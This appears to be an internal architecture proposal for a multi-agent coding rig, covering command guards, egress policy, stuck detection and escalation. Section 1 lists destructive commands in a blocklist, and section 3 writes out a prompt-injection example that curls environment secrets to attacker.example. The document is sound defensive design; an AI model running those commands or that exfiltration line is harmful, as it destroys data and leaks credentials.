Engineering Rig — Proposed Improvements (v2, Architect Revision)¶
This revision supersedes architecture-proposed.md (v1). It keeps v1's spirit — adopt what works, ignore what doesn't — but reaches different conclusions after a deeper read of the Conductor-E source, the Gastown architecture, and a wider audit of 14 multi-agent platforms documented in research-multi-agent-platforms.md.
The TL;DR: adopt 2 patterns from Gastown, reframe 2, drop 1, and add 6 things v1 missed entirely (4 from the wider research audit, 2 from a Conductor-E source-level read).
Why a v2¶
v1 enumerated five Gastown features and proposed adopting them as a bundle. Three problems with that framing:
1. Gastown's bundle hangs together because of one philosophy. Their core principle (called GUPP — "if there's work on your hook, you must run it") demands that agents push direct to main with no human gate. From that, they need:
- Prime, because every restart must reconstruct "what work am I on" from external state
- Hard guards with no override, because nobody is reviewing
- Identity attribution, because direct-to-main means commits must trace
- Escalation routing, because the only safety valve when stuck is paging up
Pull GUPP out and the bundle decouples. Our rig uses PR-based human-in-loop (Review-E gates, auto-merge fires only after approvals, Copilot reviews each commit). The pressure that justifies the full bundle isn't there.
2. The source tells a different story than the docs. A code-level audit of dashecorp/conductor-e revealed:
| Claim | Reality |
|---|---|
| 41 event types defined | 28 are actually defined in Events.cs. Docs are aspirational. |
| `GET /api/reviews/next` is missing | It exists in Program.cs:804–808 with optimistic claim semantics. README is stale. |
| Escalation is wired | `Escalated` event projects an issue to `state="failed"`, but no Discord routing, no stale-detection cron, no auto re-escalation. The data model is half-built. |
| Assignment is smart | Pure priority + FIFO sort. No capacity check and no per-agent cursor — a misbehaving agent can be assigned multiple issues, and we can't reliably ask "what events has Dev-E acknowledged?" |
3. The wider audit surfaced patterns that recur across independent codebases. When OpenHands, Goose, and Sweep all converge on cheap deterministic stuck-detection without anyone copying anyone, that's the strongest "build this" signal in the bunch. See research-multi-agent-platforms.md for the full convergence catalogue.
The Picks (in dependency order)¶
```mermaid
graph TB
    subgraph "Phase 1 — Safety, Traceability, Hardening (small, parallel)"
        p1[1. Dangerous-command guard]
        p2[2. Agent identity in git]
        p3[3. Default-deny egress NetworkPolicy]
        p4[4. Git worktrees per agent task]
    end
    subgraph "Phase 2 — Reliability (small-medium, parallel after Phase 1)"
        p5[5. Hook reliability spool]
        p6[6. StuckGuard middleware]
        p7[7. Human Prime SessionStart]
    end
    subgraph "Phase 3 — Smarter Coordination (medium)"
        p8[8. Per-consumer cursor + agent subscription registry]
    end
    subgraph "Phase 4 — Loop Bounding & Escalation (medium)"
        p9[9. Bounded-loop sentinel for Review/Dev ping-pong]
        p10[10. Severity routing + StaleHeartbeatService]
    end
    p1 --> p5
    p2 --> p5
    p5 --> p6
    p5 --> p8
    p8 --> p9
    p6 --> p10
    p9 --> p10
```
Phases are dependency tiers, not weeks. Phase 1 is fully parallel. Phase 4 depends on reliable hooks (#5) and stuck detection (#6) so escalations are trustworthy.
1. Dangerous-command guard (adopt directly)¶
Problem¶
Agents can execute destructive shell commands. There is no guard. A confused or compromised session can git push --force, rm -rf /, drop tables, or run sudo apt remove.
Decision¶
Port Gastown's tap_guard_dangerous (internal/cmd/tap_guard_dangerous.go, ~50 lines) as a Bash equivalent. No override flag — Gastown intentionally has none. The right escape hatch is "the human runs the command outside the agent loop." This avoids the failure mode where an agent learns to bypass its own guard.
```mermaid
sequenceDiagram
    participant CC as Claude Code
    participant G as guard.sh
    participant CE as Conductor-E
    CC->>G: PreToolUse JSON on stdin
    G->>G: Match command vs blocklist
    alt safe
        G-->>CC: exit 0
        CC->>CC: Execute
    else dangerous
        G->>CE: POST /api/events GUARD_BLOCKED (best-effort)
        G-->>CC: exit 2 + reason
        CC->>CC: Refuses, asks human
    end
```
Blocklist (mirrors Gastown's heuristics)¶
| Pattern | Notes |
|---|---|
| `sudo` (any) | Privilege escalation outside agent context |
| `rm -rf /` or `rm -rf /*` | Filesystem destruction. Local paths like `rm -rf ./build/` are allowed. |
| `git push --force` | Allow `--force-with-lease` and `--force-if-includes` |
| `git reset --hard`, `git clean -f` | Loses work |
| `drop table`, `drop database`, `truncate table` | Data loss |
| `kubectl delete namespace` | Cluster-scope destruction |
| `apt\|apt-get\|dnf\|yum\|pacman\|brew install` | Should go through the devcontainer image |
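A minimal sketch of the Bash port under stated assumptions: the PreToolUse stdin field name (`.tool_input.command`) and the `GUARD_BLOCKED` event shape are assumptions, and `check_cmd` is a hypothetical helper that isolates the blocklist match:

```shell
# Sketch of guard.sh core. Returns 0 (safe) or 2 (blocked).
check_cmd() {
  local cmd="$1" pat
  local blocklist=(
    '(^|[;&|])[[:space:]]*sudo([[:space:]]|$)'
    'rm[[:space:]]+-rf[[:space:]]+/(\*|[[:space:]]|$)'
    'git[[:space:]]+push[[:space:]]+.*--force([[:space:]]|$)'   # lease/includes variants pass
    'git[[:space:]]+reset[[:space:]]+--hard'
    'git[[:space:]]+clean[[:space:]]+-f'
    'drop[[:space:]]+(table|database)|truncate[[:space:]]+table'
    'kubectl[[:space:]]+delete[[:space:]]+namespace'
  )
  for pat in "${blocklist[@]}"; do
    if grep -qiE -- "$pat" <<<"$cmd"; then
      echo "Blocked dangerous command (matched: $pat). Run it outside the agent loop." >&2
      return 2
    fi
  done
  return 0
}

# Hook entrypoint (assumed PreToolUse JSON shape):
# cmd="$(jq -r '.tool_input.command // empty')"
# if ! check_cmd "$cmd"; then
#   curl -s -m 2 -X POST "$CONDUCTOR_URL/api/events" \
#     -d '{"type":"GUARD_BLOCKED"}' >/dev/null 2>&1 || true   # best-effort telemetry
#   exit 2
# fi
```

Note the event POST is deliberately fire-and-forget with a short timeout: the guard must still block even when Conductor-E is down.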
Drop from v1's plan¶
pr-workflow-guard (Gastown blocks gh pr create and git checkout -b because their agents push direct to main). We want PRs. Adopting this guard would break our model.
Touch¶
dashecorp/rig-tools (new hooks/dangerous-command-guard.sh + register in install.sh); dashecorp/rig-agent-runtime (add to base image hooks); HelmRelease values to wire into agent settings.
2. Agent identity in git (adopt directly — it's trivial)¶
Problem¶
Commits from agents use generic author info. Cost dashboard already breaks down by agentId (per TokenUsageProjection), but git history doesn't.
Decision¶
Set GIT_AUTHOR_NAME and GIT_AUTHOR_EMAIL from the agent's agentId env var. For humans, the existing CONDUCTOR_AGENT_ID=human-$(whoami) already works — we just need to wire it through to git config in the devcontainer post-create.
This is a 5-line change. Do not call it a "system." It's an env var.
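The whole change, sketched; the email domain is an invented placeholder, and `agent_git_identity` is a hypothetical helper name for the post-create step:

```shell
# Devcontainer post-create sketch: derive git identity from the agent id.
agent_git_identity() {
  local id="${CONDUCTOR_AGENT_ID:-human-$(whoami)}"   # same fallback as the hooks
  export GIT_AUTHOR_NAME="$id"
  export GIT_AUTHOR_EMAIL="${id}@agents.dashecorp.dev"  # placeholder domain
  export GIT_COMMITTER_NAME="$GIT_AUTHOR_NAME"
  export GIT_COMMITTER_EMAIL="$GIT_AUTHOR_EMAIL"
}
```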
Touch¶
dashecorp/rig-gitops (HelmRelease values for dev-e and review-e); dashecorp/rig-agent-runtime (devcontainer post-create script).
3. Default-deny egress NetworkPolicy [research]¶
Problem¶
Today our agent pods have no egress restrictions. A prompt-injection vector that gets Dev-E to curl https://attacker.example/exfil -d "$(env)" would succeed. Cursor shipped default-deny egress for shell commands in their 2026 rewrite as the standard hardening for exactly this reason.
Decision¶
Add a per-agent K8s NetworkPolicy allowing egress only to:
- GitHub API + raw.githubusercontent.com (work source)
- api.anthropic.com (LLM)
- Conductor-E ClusterIP (event sink)
- Container registry (`europe-north1-docker.pkg.dev`)
- DNS (kube-system)
Block everything else by default. If an agent legitimately needs another endpoint, that's an explicit additive policy change reviewed in PR.
This is 30 lines of YAML per agent namespace. No code changes. It closes the generic prompt-injection exfiltration path, since an attacker-controlled endpoint is simply unreachable; exfiltration through the allowed endpoints remains a residual risk caught at the review gate.
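A sketch of the shape, assuming namespace names and a ClusterIP-based Conductor-E rule; the GitHub, Anthropic, and registry rules are only gestured at, since stock NetworkPolicy matches IPs and ports, not hostnames:

```yaml
# Sketch — namespaces, labels, and ports are assumptions, not real values.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: dev-e-default-deny-egress
  namespace: dev-e
spec:
  podSelector: {}              # every pod in the agent namespace
  policyTypes: [Egress]
  egress:
    - to:                      # Conductor-E event sink
        - namespaceSelector:
            matchLabels: { kubernetes.io/metadata.name: conductor-e }
    - to:                      # DNS
        - namespaceSelector:
            matchLabels: { kubernetes.io/metadata.name: kube-system }
      ports:
        - { port: 53, protocol: UDP }
    # GitHub / api.anthropic.com / europe-north1-docker.pkg.dev need
    # ipBlock CIDRs or a CNI with FQDN policies (e.g. Cilium) — plain
    # NetworkPolicy cannot match hostnames.
```

The FQDN caveat is the one design decision to settle in the PR: either pin published IP ranges as `ipBlock` entries, or rely on a CNI extension that supports DNS-name rules.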
Touch¶
dashecorp/rig-gitops (new apps/<agent>/network-policy.yaml per agent).
4. Git worktrees per agent task [research]¶
Problem¶
When KEDA scales Dev-E to >1 replica on the same repo (or even different issues in the same repo), each replica clones the full repo. That's slow on cold start, eats PVC space, and creates the failure mode where two replicas race on filesystem operations.
Cursor's Cloud Agents handles this with git worktrees: one bare clone per repo + N worktrees, one per active task. Atomic file ops, no race, fast cold start. They report 35% of their own merged PRs are now agent-authored — they've stress-tested this model.
Decision¶
In rig-agent-runtime startup:
```bash
# One bare clone per repo, cached
git clone --bare "$REPO_URL" "/workspace/.bare/$REPO_NAME"

# Per-task worktree, ephemeral
git -C "/workspace/.bare/$REPO_NAME" worktree add "/workspace/work/$TASK_ID" "$BRANCH"
```
Cleanup on pod termination removes the worktree but keeps the bare clone for the next replica.
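The cleanup half can be a termination trap. A sketch under one stated assumption: the `WORKSPACE_ROOT` override is invented here for testability, the runtime would use `/workspace` directly:

```shell
# Termination cleanup sketch — drops the task worktree, keeps the bare
# clone for the next replica.
cleanup_worktree() {            # $1 = repo name, $2 = task id
  local root="${WORKSPACE_ROOT:-/workspace}"
  git -C "$root/.bare/$1" worktree remove --force "$root/work/$2" || true
  git -C "$root/.bare/$1" worktree prune || true
}

# In the entrypoint:
# trap 'cleanup_worktree "$REPO_NAME" "$TASK_ID"' TERM EXIT
```

`worktree prune` also clears stale metadata left by replicas killed before their trap ran, so the bare clone never accumulates dead worktree records.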
Touch¶
dashecorp/rig-agent-runtime (startup script changes).
5. Hook reliability spool (gap v1 missed)¶
Problem¶
/tmp/dashecorp-rig-tools/hooks/conductor-e-hook.sh:63 fires events as curl ... & — fire-and-forget, no retry, no log. If Conductor-E is down (Flux reconciling, pod restarting, network blip), events vanish silently. Heartbeats vanish. Branch and PR creation events vanish. The cost dashboard goes blind. Stale-detection (Phase 4) becomes untrustworthy — an "absent heartbeat" might mean "agent is stuck" or "Conductor-E was down for 90 seconds."
Decision¶
Local spool with at-least-once delivery.
```mermaid
sequenceDiagram
    participant H as hook.sh
    participant SP as Spool dir
    participant CE as Conductor-E
    H->>SP: Append event JSON to spool file (ts + uuid)
    H->>CE: POST /api/events (5s timeout)
    alt ok
        H->>SP: Delete spool entry
    else fail or timeout
        Note over H: Event stays in spool
    end
    Note over H,CE: --- next hook invocation ---
    H->>SP: Drain (oldest first, max N per call)
    SP->>CE: POST each
    CE-->>H: 2xx to delete, otherwise keep
```
Detail¶
- Spool dir: `~/.cache/conductor-e-spool/` (host) or `/var/cache/conductor-e-spool/` (in-pod)
- Drain budget: max 20 events per hook invocation, max 1s wall time, oldest-first
- Idempotency: include `eventId` (UUID) on every event so server-side dedup is possible (separate, optional)
- Backoff: if Conductor-E returns 5xx three times in a row, skip drain for 30s (avoid hammering)
- Bound: cap spool at 1000 entries; drop oldest with a `WARN` to stderr
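The spool-and-drain shape can be sketched in a few lines. `post_event` is a hypothetical stand-in for the `curl` POST to `/api/events`, and the wall-time budget and backoff are omitted for brevity:

```shell
# Spool sketch — at-least-once delivery for hook events.
SPOOL_DIR="${SPOOL_DIR:-$HOME/.cache/conductor-e-spool}"

spool_event() {                 # $1 = event JSON
  mkdir -p "$SPOOL_DIR"
  # ts-first filename gives oldest-first ordering; the uuid doubles as
  # an idempotency key for server-side dedup.
  printf '%s\n' "$1" \
    > "$SPOOL_DIR/$(date +%s%N)-$(uuidgen 2>/dev/null || echo "$$-$RANDOM").json"
}

drain_spool() {                 # oldest-first, max 20 per invocation
  local f
  for f in $(ls "$SPOOL_DIR" 2>/dev/null | sort | head -20); do
    # Delete only on success; stop draining on first failure so order holds.
    post_event "$(cat "$SPOOL_DIR/$f")" && rm -f "$SPOOL_DIR/$f" || break
  done
}
```

Because every event is spooled before the POST is attempted, a crash between the two leaves at worst a duplicate, never a loss — hence the `eventId` dedup hook on the server side.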
Touch¶
dashecorp/rig-tools (modify hooks/conductor-e-hook.sh); dashecorp/rig-agent-runtime (mount spool dir in devcontainer).
6. StuckGuard middleware [research]¶
Problem¶
Agents can loop indefinitely. Today the only signal is: human notices, manually intervenes. The AgentStuck event type exists in Events.cs but nothing emits it autonomously.
The convergence signal¶
Three independent codebases — OpenHands StuckDetector, Goose RepetitionInspector, Sweep AI's visited_set + attempt counter — all converged on the same insight: don't ask the LLM whether it's stuck — count repeated tool calls and break above a threshold. None of them rely on the LLM noticing. This is the strongest "build this" signal in the wider research.
Decision¶
Implement a StuckGuard middleware in Dev-E (and Review-E) that runs in the agent loop, watching the last N tool calls. Detect 5 patterns from OpenHands' production-tested set:
| Pattern | Threshold | Meaning |
|---|---|---|
| Identical (tool, args) repeated | 4× | Agent is spinning on the same call |
| Same tool returning same error | 3× | Agent doesn't understand the failure |
| Multiple agent messages with no tool calls between them | 3× | Agent is monologuing |
| ABAB alternation (tool A → tool B → tool A → tool B) | 6 steps | Oscillating without progress |
| Context-window compaction marker repeated | 2× | Falling out of context |
On any pattern: emit AgentStuck { agentId, repo, issueNumber, pattern, recentCalls } to Conductor-E, then exit the agent loop. Phase 4's escalation router picks it up.
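Two of the five detectors sketched for `stuck-guard.js`; class and method names are assumptions, thresholds mirror the table above:

```javascript
// StuckGuard sketch — deterministic pattern counting over recent tool calls.
class StuckGuard {
  constructor({ identicalLimit = 4, ababWindow = 6 } = {}) {
    this.identicalLimit = identicalLimit;
    this.ababWindow = ababWindow;
    this.calls = []; // normalized keys of recent (tool, args) calls
  }

  // Call once per tool call; returns a pattern name when stuck, else null.
  observe(tool, args) {
    this.calls.push(`${tool}:${JSON.stringify(args)}`);

    // Pattern 1: identical (tool, args) repeated identicalLimit times.
    const tail = this.calls.slice(-this.identicalLimit);
    if (tail.length === this.identicalLimit && new Set(tail).size === 1) {
      return "identical-call";
    }

    // Pattern 4: ABAB alternation over the last ababWindow steps.
    const win = this.calls.slice(-this.ababWindow);
    if (win.length === this.ababWindow && new Set(win).size === 2 &&
        win.every((c, i) => c === win[i % 2])) {
      return "abab-alternation";
    }
    return null;
  }
}
module.exports = { StuckGuard };
```

The same-error and monologue detectors follow the identical shape (count over a sliding tail), which is what makes this cheap enough to run on every step.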
Why deterministic, not LLM-judged¶
LLM-judged stuck-detection has two failures: (1) it costs another model call per step, (2) the same agent that's stuck is the one being asked "are you stuck." Pattern-counting is cheap, deterministic, and works.
Touch¶
dashecorp/rig-agent-runtime (new src/middleware/stuck-guard.js); character.json toggles.
7. Human Prime (reframe of v1's "Session Recovery")¶
Why reframe¶
v1 framed this as "agents lose state on restart." They don't — Dev-E is a stateless K8s pod whose cron polls GET /api/assignments/next every 5 minutes. Conductor-E already remembers what each agent is on. Restart-resume for agents is essentially solved.
The real gap is for humans using Claude Code locally. When a human starts a new session, they have no equivalent of Gastown's prime. They have to remember what they were last working on.
Decision¶
Ship a SessionStart hook that does one HTTP call:
```bash
curl -s "$CONDUCTOR_URL/api/agents/$CONDUCTOR_AGENT_ID" \
  | jq '{currentIssue, currentRepo, lastEvent}' \
  | format-as-context
```
Plus a peek at the current git branch to derive the open PR (via gh pr view). Output as a brief context block at session start.
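The formatting step, sketched under stated assumptions: the response shape (`currentIssue`, `currentRepo`, `lastEvent`) matches the `jq` filter above, and `prime_context` is a hypothetical helper standing in for `format-as-context`:

```shell
# SessionStart prime sketch — turn agent state JSON into a context line.
prime_context() {               # $1 = agent state JSON
  jq -r '"You were working on \(.currentRepo)#\(.currentIssue). " +
         "Last event: \(.lastEvent)."' <<<"$1"
}
```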
No tmux, no Beads, no roles, no markdown templates per role. That's all Gastown infrastructure justified by Gastown scale. We don't have it and don't need it.
Touch¶
dashecorp/rig-tools (new hooks/conductor-e-prime.sh, register SessionStart in install.sh).
8. Per-consumer cursor + agent subscription registry [research]¶
Why this replaces v1's "per-pod capacity events"¶
v1 proposed CapacityAvailable / CapacityFull events to make assignment capacity-aware. After reading LangGraph's versions_seen and MetaGPT's _watch + msg_buffer, the same problem has a cleaner shape: per-consumer cursor on the event log. Capacity is one of several things this enables, not its own primitive.
Problem¶
Today:

- `MartenEventStore.ClaimNextAssignmentAsync` (lines 43–56) sorts by priority + last-updated. No capacity check.
- Agents have no cursor — there's no way to ask "what events has Dev-E already consumed?"
- KEDA scales pods based on Valkey stream length, but Conductor-E has no notion of per-pod busy state.
- Two pods of the same agent class can both poll `assignments/next` and both get work.
All four are symptoms of the same missing abstraction.
Decision¶
Add an agent_cursors projection (Marten):
```csharp
record AgentCursor(
    string AgentId,
    long LastEventOrdinal,
    DateTimeOffset LastUpdated,
    HashSet<string> SubscribedEventTypes,
    int ConcurrentSlots,        // typically 1
    int InFlightAssignments     // current count
);
```
Add an agent_subscriptions registry — a YAML file in rig-gitops that says, per agent class:
```yaml
dev-e:
  consumes: [IssueAssigned, ChangesRequested, ReviewLoopExceeded]
  produces: [WorkStarted, BranchCreated, PrCreated, AgentStuck]
  concurrent_slots: 1
review-e:
  consumes: [PrCreated, ChangesPushed]
  produces: [PrReviewApproved, ChangesRequested, ReviewLoopExceeded]
  concurrent_slots: 2
```
Three benefits:

- Capacity-aware assignment. `ClaimNextAssignmentAsync` checks `ConcurrentSlots - InFlightAssignments > 0` before returning.
- Topology validation at deploy time. A startup check that every `produces` type has at least one consumer catches dead-end events. (The AutoGen 0.4 pattern.)
- Per-agent replay. "Show me everything Dev-E has acknowledged in the last hour" becomes a query against `LastEventOrdinal`, not a log scrape.
Touch¶
dashecorp/conductor-e (new AgentCursorProjection, AgentSubscriptionRegistry, modify ClaimNextAssignmentAsync); dashecorp/rig-gitops (new apps/<agent>/subscription.yaml).
9. Bounded-loop sentinel for Review/Dev ping-pong [research]¶
Problem¶
ChatDev caps inner-phase chats at chat_turn_limit rounds. We don't. Review-E and Dev-E can theoretically ping-pong on a PR forever — Review requests changes, Dev pushes commits, Review requests more changes, repeat. There's no upper bound, no escalation.
Decision¶
Track the round-trip count per PR as a projection:
Increment on each (ChangesRequested → ChangesPushed) cycle. After 3 round-trips, emit ReviewLoopExceeded { repo, prNumber, count } and route to Phase 4's escalation as P1 severity.
Threshold is configurable per repo via subscription registry but defaults to 3.
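The real version is a Marten projection in C#; as an illustration of the fold rule only, a sketch in JS (function name and event shapes are assumptions, the cycle definition and default threshold mirror the text above):

```javascript
// Round-trip counter sketch: one ChangesRequested→ChangesPushed pair = 1 cycle.
function reviewLoopState(events, limit = 3) {
  let roundTrips = 0;
  let awaitingPush = false;
  for (const e of events) {
    if (e.type === "ChangesRequested") {
      awaitingPush = true;
    } else if (e.type === "ChangesPushed" && awaitingPush) {
      awaitingPush = false;
      roundTrips += 1;
    }
  }
  // "After 3 round-trips" → trigger once the count reaches the limit.
  return { roundTrips, exceeded: roundTrips >= limit };
}
module.exports = { reviewLoopState };
```

Counting paired events (rather than raw `ChangesRequested` totals) means a reviewer re-requesting changes before Dev-E has pushed doesn't double-count a cycle.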
Touch¶
dashecorp/conductor-e (new ReviewLoopStateProjection + new event type ReviewLoopExceeded).
10. Escalation completion: severity routing + stale-detection (extended)¶
What's already there¶
- `Escalated` event type defined (Events.cs)
- `Escalated` event projects to `state="failed"` (MartenProjections.cs:100–103)
- `DiscordEventListener` exists as a `BackgroundService` and posts all issue events to per-issue threads
What's missing¶
- No severity dimension on `Escalated`. It's a flag, not a level.
- No routing logic — escalations land in the same per-issue thread as everything else, with no @mention, no priority signal.
- No stale-detection. The `AgentStuck` event type exists but nothing emits it autonomously (the tool-loop case is now solved by #6 StuckGuard; this fills the heartbeat-stale case).
Decision¶
Add severity to escalation, add a StaleHeartbeatService background worker, route by severity. StuckGuard (#6) and ReviewLoopExceeded (#9) feed in alongside heartbeat-based detection.
```mermaid
graph TB
    A[Agent or human hook] -->|Escalated severity:P1<br/>reason text| CE[Conductor-E]
    SG[StuckGuard #6] -->|emits AgentStuck<br/>on tool-loop pattern| CE
    SD[StaleHeartbeatService<br/>BackgroundService, 60s tick] -->|emits AgentStuck<br/>after 5min no heartbeat| CE
    RL[ReviewLoopExceeded #9] --> CE
    CE --> R{Router by severity}
    R -->|P2| THR[Per-issue Discord thread]
    R -->|P1| ADM[#admin channel]
    R -->|P0| DM[Discord DM + @mention]
    SU[Stale escalation projection<br/>30s tick] -->|unacked > 4h| BUMP[Bump severity P2 to P1, P1 to P0]
    BUMP --> R
```
Why a projection-based escalator, not an LLM Mayor¶
Gastown uses an LLM "Deacon" agent to run gt escalate stale on a loop. We don't need an LLM for "if now - lastHeartbeat > 5min then emit AgentStuck." A C# BackgroundService is 30 lines. It also has the right reliability properties: it runs in-process with the event store, so it sees writes immediately and can't be racing a separate process.
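The unacked-bump rule from the diagram is equally mechanical. A sketch (the real home is the C# projection; `bump_severity` is a hypothetical name, the 4h threshold comes from the diagram):

```shell
# Escalation bump sketch — promote unacknowledged escalations.
bump_severity() {               # $1 = severity, $2 = seconds unacked
  if [ "$2" -gt 14400 ]; then   # 4 hours
    case "$1" in
      P2) echo P1 ;;
      P1) echo P0 ;;
      *)  echo "$1" ;;          # P0 has nowhere higher to go
    esac
  else
    echo "$1"
  fi
}
```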
Touch¶
dashecorp/conductor-e (Events.cs add severity to Escalated, add EscalationAcknowledged/EscalationClosed; new StaleHeartbeatService.cs; new EscalationRouter consumed by DiscordEventListener); dashecorp/rig-tools (conductor-e-hook ESCALATE --severity P1 "reason").
What v1 had that v2 drops¶
Centralized hooks merge framework¶
v1 proposed hooks-base.json + hooks-overrides/{role}.json + a merge script. Gastown has this because it serves 8 agent runtimes × 6 roles × N rigs and needs per-matcher composition rules.
We have ~3 agent classes and a handful of humans. The same outcome is achievable with HelmRelease values templating settings.json for agents (already partially done) and a single settings.json shipped by rig-tools/install.sh for humans. Two paths. No framework.
If we get to 8+ agent variants, revisit. Until then, this is premature abstraction.
pr-workflow-guard¶
Already covered above. Blocking gh pr create is opposite to our model.
Deferred (worth building, not in this milestone)¶
These came out of the wider research with real merit, but compete on attention with the picks above. Listed so they're not forgotten. Each is a follow-up proposal candidate, not a "next sprint" item.
| # | Pick | Source | Why deferred |
|---|---|---|---|
| D1 | PageRank-ranked repo map as `RepoMapBuilt` event | Aider | Improves Dev-E cold-start grounding. ~3 days (tree-sitter + PageRank service). Defer until #8 cursor work is done — repo map should be cursor-driven. |
| D2 | Pre-assignment task refinement (clarifier) | Camel + GPT Pilot | Posts clarifying questions on ambiguous issues, labels needs-clarification. Saves Dev-E tokens. Adds an LLM call per intake (cost). Defer until we have data on intake fuzziness. |
| D3 | N parallel attempts + arbitration on KEDA scale-out | SWE-agent + Cognition | Today KEDA scales Dev-E to >1 only on stream length; multiple replicas on the same issue is rare. Build when that becomes common. |
| D4 | Formatter-reversion check | Sweep AI | Pre-commit hook that rejects Dev-E's edit if prettier/black reverses it. ~2 lines. Trivial — fold into devcontainer post-commit when convenient. |
| D5 | GitHub Spec Kit `.specify/` layout for multi-PR work | github/spec-kit | Markdown specs in repo, sub-issues from tasks/. Organizational change. Discuss separately before adopting. |
| D6 | Recipes as YAML config artifacts | Goose | Lift Dev-E / Review-E system-prompt patterns into versioned YAML. Worth it once we have 4+ recipes; today 2 prompts in HelmRelease values is fine. |
| D7 | `ContextCompressed` event for long-task resume | Cognition | Lets a fresh Dev-E replica resume a long task. Build when we observe long-task context overruns in production. |
| D8 | `QuestionAsked` / `QuestionAnswered` paired events for sub-agent clarification | CrewAI | Extends #8 (subscription registry). Build when there's a real use case for one agent asking another a clarifying question. |
What this does NOT change¶
- Conductor-E stays the central event store and assignment engine
- Marten + PostgreSQL stays — no Dolt/Beads
- GitHub Issues stays the source of truth — no `bd`
- FluxCD stays the GitOps layer
- KEDA scale-to-zero stays — improvement #8 makes it more accurate via cursor + capacity
- Discord stays the human-facing channel — improvement #10 routes within Discord, doesn't replace it
- AGENTS.md stays the cross-tool rules document
- Devcontainer + rig-agent-runtime image stays the unified environment
- MkDocs at rig-docs.pages.dev stays the published docs surface
These are layered improvements on top of an already-functioning rig. No rewrites.
Anthropic's overarching warning¶
The Anthropic Claude Agent SDK doc "Building Effective Agents" warns:
"Most multi-agent setups are slower and worse than a single agent with good tools — invest in agent-computer interface first."
Our 3-agent shape (Conductor-E, Dev-E, Review-E) has clean handoff boundaries and survives that warning. The trap to watch is growing the role count. When proposing a new agent, the bar is: "does this role have a clean event-shaped boundary with the existing agents?" If the answer requires shared intra-task context, build a tool instead. GPT Pilot's 6-role pipeline is now archived as unmaintained; it's evidence of where this fails.
Reading order for whoever picks this up¶
- architecture-current.md — what the rig looks like today
- architecture-proposed.md — v1, kept for history
- This document (v2) — the decided direction
- research-multi-agent-platforms.md — backing research with the `[research]`-tagged picks justified
- documentation-standard.md — frontmatter, doc-check CI
- onboarding.md — devcontainer setup for humans
When this work is broken into issues, each section above ("Touch") names the repos involved.